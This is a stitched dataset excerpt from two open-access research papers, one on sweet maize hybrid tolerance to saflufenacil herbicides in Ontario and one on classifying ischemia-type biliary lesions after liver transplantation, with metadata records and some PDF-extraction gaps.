Statistical analysis of the data on visible injury, plant height, cob size and yield showed that the random effects of location, year, year by location and interactions with treatments were not significant.Therefore, data were pooled and averaged over years and locations (Tables 1-4).a Abbreviations: su = sugary; sh 2 = shrunken endosperm mutant genotype; b Results are averaged for both locations and years; means followed by the same letter within a row for each treatment are not significantly different according to Fisher's Protected LSD test (P ≤ 0.05).
Crop Injury
Visible injury symptom observed was leaf speckling.
Results are similar to those reported in field maize.Soltani et al. (2009) [19] found 1% or less injury in maize with saflufenacil applied PRE at 50, 100 and 200 g a.i.ha -1 .Moran (2010) [20] also found no injury in field maize with saflufenacil applied PRE at 75 and 150 g a.i.ha -1 or saflufenacil plus dimethenamid-p applied PRE at 735 and 1470 g a.i.ha -1 .Little visible injury seen in different sweet maize varieties evaluated in this study is similar with previous studies on clopyralid [21] and to a Abbreviations: su = sugary; sh 2 = shrunken endosperm mutant genotype; b Results are averaged for both locations and years; means followed by the same letter within a row for each treatment are not significantly different according to Fisher's Protected LSD test (P ≤ 0.05).
Plant Height
No reduction in plant height was observed for any of the eight sweet maize hybrids treated with saflufenacil or saflufenacil plus dimethenamid-p applied PRE at doses evaluated (Table 2).Plant height was similarly unaffected by increasing herbicide doses.In other studies, Soltani et al. (2009) [19] reported no adverse effect in field maize height with saflufenacil applied PRE in field maize at dose up to 200 g a.i.ha -1 .Lack of any height reduction between sweet maize hybrids evaluated in this study with saflufenacil and saflufenacil plus dimethenamid-p is similar to those found with other herbicides such as clopyralid, halosulfuron and topramezone [21,26].
Cob Size
Saflufenacil and saflufenacil plus dimethenamid-p applied PRE at doses evaluated caused no decrease in cob size of Cahill, GH4927, Harvest Gold, Rocker, BSS5362, GG236, GG447, and GG763 sweet maize (Table 3).Results in these trials are similar to findings with other herbicides such as halosulfuron which did not caused any negative impact on cob size at 1X or 2X of the proposed label dose for any of the sweet maize hybrids studied [26].However, other studies have shown that cob size of susceptible hybrids can be reduced up to 67% with clopyralid or thifensulfuron-methyl [18,21].
Yield
Saflufenacil applied and saflufenacil plus dimethenamidp applied PRE at doses evaluated caused no adverse effect on yield of Cahill, GH4927, Harvest Gold, Rocker, BSS5362, GG236, GG447, and GG763 sweet maize (Ta-ble 4).Yield was similarly unaffected by increasing herbicide doses in all sweet maize hybrids evaluated.In other studies, Soltani et al. ( 2009) [19] reported no adverse effect in yield with saflufenacil applied PRE in field maize at dose up to 200 g a.i.ha -1 .Moran (2010) [20] also found no yield reduction in field maize with saflufenacil applied PRE at 75 and 150 g a.i.ha -1 or saflufenacil plus dimethenamid applied PRE at 735 and 1470 g a.i.ha -1 .Yield response with saflufenacil and saflufenacil plus dimethenamid-p are similar to yield response in other herbicides, such as clopyralid [21], topramezone [22] and halosulfuron [26] which were not adversely affected when the herbicide was applied at the label dose.However, other studies have reported significant injury in some sweet maize hybrids with certain herbicides.Diebold et al. (2003Diebold et al. ( , 2004) ) [10] reported up to 94% reduction in yield with formsulfuron in sweet maize.Similar yield reduction were reported with mesotrione [13], nicosulfuron [14], foramsulfuron [10] and nicosulfuron plus rimsulfuron [24,25] in some sensitive sweet maize hybrids.The potential for and level of crop injury from use of nicosulfuron, mesotrione, and foramsulfuron on any specific sweet maize hybrid is conditioned largely by CYP alleles at the nsf1/ben1 locus on the short arm of chromosome 5 [27].However, the sensitivity of sweet maize to other herbicides is controlled by other gene loci.Bentazon metabolism, for example, is controlled by ben1, as well as two independent genes, Cr1 and Cr2 [28].It is hypothesized that sweet maize tolerance to saflufenacil is also conditioned by alternate alleles of the above genes and/or different gene loci, which have, as yet, not been determined.
Conclusion
Based on this study, the sweet maize hybrids Cahill, GH4927, Harvest Gold, Rocker, BSS5362, GG236, GG447, and GG763 are tolerant to saflufenacil and saflufenacil plus dimethenamid-p applied PRE at doses evaluated.Saflufenacil and saflufenacil plus dimethenamid-p applied PRE to eight sweet maize hybrids had no negative effect on sweet maize injury, height, cob size, or yield.As the dose of saflufenacil or saflufenacil plus dimethenamid-p was increased from 1X to 2X of the proposed label dose, there was no negative effect on any sweet maize hybrid.This study shows that saflufenacil and saflufenacil plus dimethenamid-p can be safely applied to these eight sweet maize hybrids at the proposed label dose.The registration of saflufenacil alone or premixed with dimethenamid-p would provide Ontario sweet maize producers with a new, broad-spectrum herbicide that controls selected annual grass and broadleaved weed species.Furthermore, if used in a diversified, integrated weed management program it would reduce the selection intensity for herbicide resistant weeds.
Table 1 . Injury at 1 and 2 weeks after emergence (WAE) of eight sweet maize hybrids treated prior to emergence with saflufenacil at 0, 75, and 150 g•ha -1 or saflufenacil plus di- methenamid-p at 0, 735, and 1470 g•ha -1 at Exeter, ON, and Ridgetown, ON, in 2008 and 2009. Injury 1 WAE Injury 2 WAE Treatment/Hybrid a 75/735 b 150/1470 b 75/735 b 150/1470 b _________________%_________________
a Abbreviations: su = sugary; sh 2 = shrunken endosperm mutant genotype; b Results are averaged for both locations and years; means followed by the same letter within a row for each treatment are not significantly different according to Fisher's Protected LSD test (P ≤ 0.05). | 2018-12-13T08:21:04.693Z | 2012-01-01T00:00:00.000 | {
"year": 2012,
"sha1": "539ddf1e03e54609686afe17d2ac3cd0ec4a90cd",
"oa_license": "CCBY",
"oa_url": "http://www.scirp.org/journal/PaperDownload.aspx?paperID=16642",
"oa_status": "GOLD",
"pdf_src": "MergedPDFExtraction",
"pdf_hash": "539ddf1e03e54609686afe17d2ac3cd0ec4a90cd",
"s2fieldsofstudy": [
"Agricultural and Food Sciences"
],
"extfieldsofstudy": [
"Biology"
]
} |
4038253 | pes2o/s2orc | v3-fos-license | Clinical Analysis of Classification and Prognosis of Ischemia-Type Biliary Lesions After Liver Transplantation
Background The aim of this study was to classify ischemia-type biliary lesions after liver transplantation according to their imaging findings and severity of clinical manifestations and to analyze the relationship between such classification and prognosis. Material/Methods We collected clinical data of patients with ischemia-type biliary lesions (ITBL) after liver transplantation in the Organ Transplantation Center, the First Central Hospital of Tianjin, from August 2012 to July 2013; all patients were classified according to their imaging findings and relevant clinical data to analyze the relationship between their classification and prognosis. Results The mean postoperative survival time, as well as the 1-, 3-, and 5-year survival rate, in Group ITBL showed statistical significance when compared with those in Group NITBL (log rank=12.13, P<0.001), but the mean postoperative survival times among the mild, moderate, and severe ITBL cases showed no statistical significance. The incidence rates of 1-, 3-, and 5-year adverse prognosis in Group ITBL showed statistical significance when compared with Group NITBL with <2% patients who had anastomotic biliary obstruction (log rank=277.06, P<0.001), among which the difference in the incidence rate of adverse prognosis between severe and moderate ITBL cases showed no statistical significance. The difference in the incidence rate of adverse prognosis between mild and moderate ITBL cases showed statistical significance (log rank=6.01, P=0.014), and the difference in the incidence rate of adverse prognosis between mild and severe ITBL cases showed statistical significance (log rank=10.98, P=0.001). Conclusions ITBL classification based on the severity of biliary imaging and bilirubin level can predict the prognosis of ITBL.
Background
Organs that have been successfully transplanted many times include the kidneys, liver, heart, lungs, pancreas, intestine, and thymus [1]. Liver transplantation is thought to be the most effective way to treat end-stage liver diseases, including hepatic carcinoma [2], cirrhosis caused by harmful alcohol consumption, viral hepatitis B and C, and metabolic syndromes related to overweight and obesity [3]. In the last 4 decades, liver transplantation has developed from an experimental approach with a very high mortality to an almost routine procedure with good short-and long-term survival rates [4]. However, there still exist some complications that can threaten the survival of grafts, as well as affect patient quality of life [5]. Despite significant advances in orthotopic liver transplantation (OLT), biliary tract reconstruction is still a major source of complications [6], and ischemia-type biliary lesions (ITBL) is a severe, graft-threatening complications after liver transplantation [7], which is associated with worse graft survival and poor prognosis [8]. This complication develops in up to 25% of patients, with a 50% re-transplantation rate in affected patients [9], and there are 3 main outcomes. The first one is to achieve the final remission through biliary support treatment; the biliary support tube can then be removed, and liver function can return to normal. The second one needs to continue biliary support treatment to get more normal liver function, but the biliary support tube cannot be pulled out, which will form the status of long-term tube-bearing survival. The third treatment is ineffective, which may cause recurrent cholangitis and eventually lead to liver failure [10]. The dysfunction of the graft normally leads to re-transplantation and death, so treatment protocols should be developed as soon as possible to improve the patient survival rate. This study analyzed and classified the features of ITBL to achieve the goal of properly estimating the prognosis of ITBL, determining the treatment program, and improving the patient survival rate [11].
Subjects
The clinical data of patients with ITBL after liver transplantation in the Organ Transplantation Center, the First Central Hospital of Tianjin, from August 2012 to July 2013 were collected and assessed, as well as the biliary imaging results such as T-tube cholangiography, endoscopic retrograde cholangiography (ERC), percutaneous trans-hepatic cholangiography (PTC), and magnetic resonance cholangiopancreatography (MRCP). This study was conducted in accordance with the declaration of Helsinki and with approval from the Ethics Committee of the First Central Hospital of Tianjin. Written informed consent was obtained from all participants.
Criteria of imaging classification
Using data from 124 ITBL patients diagnosed by clinical and imaging results, we performed the imaging severity classification, treatment strategy analysis, and prognostic assessment. Among the 124 ITBL patients, 98.3% had hilar bile duct stenosis and 93.2% had intrahepatic bile duct stenosis. According to the biliary imaging morphology and the total bilirubin level, these ITBL patients were divided into 3 categories: mild, moderate, and severe. Imaging scores and clinical criteria for ITBL after liver transplantation are shown in Table 1, and the criteria of mild, moderate, and severe ITBL are shown in Table 2.
Observation indexes
The mean postoperative survival time and the 1-, 3-, and 5-year incidence rates of adverse prognosis were recorded during the follow-up. Risk factors included anhepatic time, intraoperative use of erythrocytes and plasma, cold ischemic time of donor, and donor weight, and these were compared among the mild, moderate, and severe ITBL patients. Half hepatic duct existed severe lesions, but more than half hepatic duct was complete The total bilirubin level was not normal and >2-fold, but not more than 100 umol/L 3 points All the hepatic ducts occurred stenosis, and stenosis involved in the secondary bile duct Intrahepatic biliary lesions involved in the whole liver, and less than half hepatic duct was complete The total bilirubin level was not normal and >100 umol/L
Statistical analysis
SPSS22.0 statistical software was used for the analysis. The measurement data are expressed as mean±standard deviation (c _ ±s). The comparison of the average values at the same time point among different groups was analyzed by one-way ANOVA. The LSD test was used for multiple comparisons, and the t test was used for intergroup comparisons. The Kaplan-Meier method was used to analyze survival time among patients with different classifications, with P<0.05 considered as statistical significance.
Classification of ITBL
According to the classification criteria in Table 2, the 124 ITBL patients were divided into mild ITBL in 28 cases (22.6%), moderate ITBL in 59 cases (47.6%), and severe ITBL in 37 cases (29.8%). The imaging examples of different levels of ITBL are shown in Figure 1.
Classification Points Conditions
Mild ITBL 1-3 The hilar injury and intrahepatic conditions didn't exceed mild injury, and no obvious jaundice Moderate ITBL 4-6 At least one item of hilar injury and intrahepatic conditions reached moderate injury, but no severe injury, and the bilirubin level was slightly elevated Severe ITBL 7-9 At least one item of hilar injury and intrahepatic conditions reached severe injury, and the bilirubin level was severely increased The right hepatic duct opening has stenosis, but the right hepatic bile duct is still intact. Total bilirubin <30 umol/L (2+2+1=5 points). (E) Severe ITBL: the main hepatic ducts occur stenosis, so long-term catheter support is required for drainage; the partial biliary tract tree in the anterior right liver lobe is normal. The patient survives bearing the tube; cholangitis is intermittent, and the liver function is abnormal. Total bilirubin <60 umol/L (3+2+2=7 points). (F) Severe ITBL: the main hepatic ducts occur stenosis, so long-term catheter support is required for drainage; the partial biliary tract tree can be seen in the liver. The patient survives bearing the tube; cholangitis is intermittent, and the liver function is abnormal. Total bilirubin <80 umol/L (3+3+2=8 points). (G) Severe ITBL: the biliary tract tree in the whole main liver trunk becomes thin and has stenosis. Partial end branches are stiff. The patient has been transplanted twice. Total bilirubin <100 umol/L (3+3+3=9 points). (H) Severe ITBL: the intrahepatic biliary tract tree disappears. The hilar biliary tract has cystic dilatation; the patient is waiting for re-transplantation. Total bilirubin >100 umol/L (3+3+3=9 points).
Relationship between ITBL classification and different risk factors
The anhepatic time, intraoperative use of erythrocytes and plasma, cold ischemic time of donor, and donor weight were compared among the mild, moderate, and severe ITBL patients, and the differences showed no statistical significance (P=0.528, 0.37, 0.156, 0.409) ( Table 3).
Relationship between ITBL classification and postoperative survival
At the end of the follow-up, all the 886 OLT recipients we investigated were divided into Group ITBL and Group NITBL and we analyzed their survival using the Kaplan-Meier method.
Discussion
ITBL after liver transplantation is unexplained and is characterized by intrahepatic and hilar biliary stricture and disappearance, which is an important part of biliary complications after liver transplantation. The criterion standard of diagnosing ITBL is trans-T tube PTC or trans-ERC cholangiography, which can show details of different lesions, such as biliary thinning, stenosis, expansion, or disappearance, in the non-anastomotic part of the donor liver [12]. It may be accompanied by liver function abnormalities, including increased levels of bilirubin, alkaline phosphatase, and glutamyl transpeptidase [13,14].
Previous studies have failed to provide definite conclusions regarding the classification of ITBL. Some studies divided it into extrahepatic type, intrahepatic type, and mixed type [15,16]. This classification based only on locations seems simple, but it cannot reflect the severity of ITBL. Most ITBL patients have both extra-and intrahepatic lesions, and only a small number of mild patients do not have intrahepatic lesions. However, regardless of intrahepatic lesions or extrahepatic lesions, they both have significant differences in the degree of severity. ITBL should be categorized from the perspective of prognosis, and the goal is to predict the 3 very different prognoses of ITBL: recovery, long-term survival, and graft dysfunction (i.e., liver failure).
There are differences in hilar biliary stricture and intrahepatic biliary stricture. Firstly, ITBL appears much more commonly in the porta hepatis than inside the liver. Secondly, the difference in the anatomical blood supply between these 2 parts is significantly different. The classic anatomy of the extrahepatic biliary duct is from the left and right hepatic ducts to the left and right liver lobes, and the right and left hepatic ducts fuse into the general hepatic duct. The intrahepatic bile duct can be further subdivided into the greater and smaller bile ducts [17,18]. The epithelium of grade 4-5 biliary ducts is lined with the basement membrane, together with tight junctions among the cells and microvilli extending into the bile duct [19]. The vascular plexus of the hilar biliary system is supplied directly through the arteries, consisting of the right and left hepatic arteries and indirect gastroduodenal artery-originated branches [20,21]. The surface veins on the bile duct closely attach to the arterial plexus and drain into other veins. The blood in the peripheral vascular plexus of the smaller bile duct connects to the sinusoid, which then connects to the portal vein system through both the lobular branches and the peri-biliary branches. Through the very small capillaries in the portal area, oxygen and nutrients can finally be transported to the sinusoid through the distal arterial branches of the hepatic artery [22]. In severe ITBL patients, all the hilar biliary ducts may collapse [11,23]. If there is simple hilar stenosis instead of intrahepatic injury, which is equivalent to a hilar biliary obstructive disease, biliary stent treatment can be performed for control. The degree of destruction of the hilar biliary tract determines whether the stent can be removed from ITBL patients, and the degree of the intrahepatic biliary injury determines whether ITBL patients will have graft dysfunction. The intrahepatic biliary blood supply can be easily recovered through the intrahepatic lobular tissue and portal blood supply. However, the destruction of the intrahepatic biliary duct caused by cholangitis is fatal. Patients with liver transplantation need life-long immunosuppressive agents, so once the support tube is blocked in such ITBL patients, it is extremely easy to cause cholangitis. Repeated biliary tract infections then further injure the biliary duct (repair and then re-stenosis), thus forming a malignant cycle of stenosis, obstruction, infection, scar repair, and aggravated stenosis [23]. Therefore, the treatment of patients with moderate ITBL (i.e., with severe hepatic portal stenosis but sufficient liver function to ensure liver metabolism) should break this malignant cycle; infection is the most easily controlled clinical aspect, so preventing the occurrence of infection is as crucial as anti-infective treatment [24,25].
The significance of the classification in this study for treatment lies in that we propose the patient group with moderate ITBL, and hope clinicians to pay more attention to this group. The prognosis of such patients can be infection-induced death or good quality of life. Many people think that once ITBL occurs, no treatment should be performed, so studies, treatment, or care toward this group of patients is ignored. It is often thought that there is no therapeutic meaning in such patients, and a necessary liver transplantation is irresponsible. In fact, it is precisely this type of patient who needs the most careful treatment, immunosuppressive agent adjustment, infection control, and biliary drainage observation. Improving biliary interventional treatment techniques, developing new biliary support equipment, and extending graft survival can even cure them.
In this study, the classification of ITBL is based on our retrospective analysis. The sample is relatively limited, and the standards among different groups still need to undergo longterm evolution and adjustment. However, classifying ITBL is of great necessity and requires more clinician attention so as to refine the diagnosis, standardize the treatment, and improve the prognosis. ITBL is not a surgical complication, and due to its higher morbidity and poorer prognosis, it is known as the "Achilles heel" of liver transplantation; furthermore, its pathogenesis is still unclear. ITBL should be studied as a separate disease, and transplantation surgeons should focus more attention on such studies and treatment of ITBL rather than feeling discouraged and ignoring it.
Conclusions
By analyzing the features of ITBL classification, our results suggest that ITBL classification can be used to predict the prognosis of ITBL based on the severity of biliary imaging and bilirubin level, and further contribute to determining the treatment program and improving survival of ITBL patients.
Conflicts of interest
None. | 2018-04-03T03:35:58.359Z | 2018-03-20T00:00:00.000 | {
"year": 2018,
"sha1": "cee65933e46ba03534195a61203a5eb5975504ae",
"oa_license": "CCBYNCND",
"oa_url": "https://europepmc.org/articles/pmc6248068?pdf=render",
"oa_status": "GREEN",
"pdf_src": "PubMedCentral",
"pdf_hash": "cee65933e46ba03534195a61203a5eb5975504ae",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.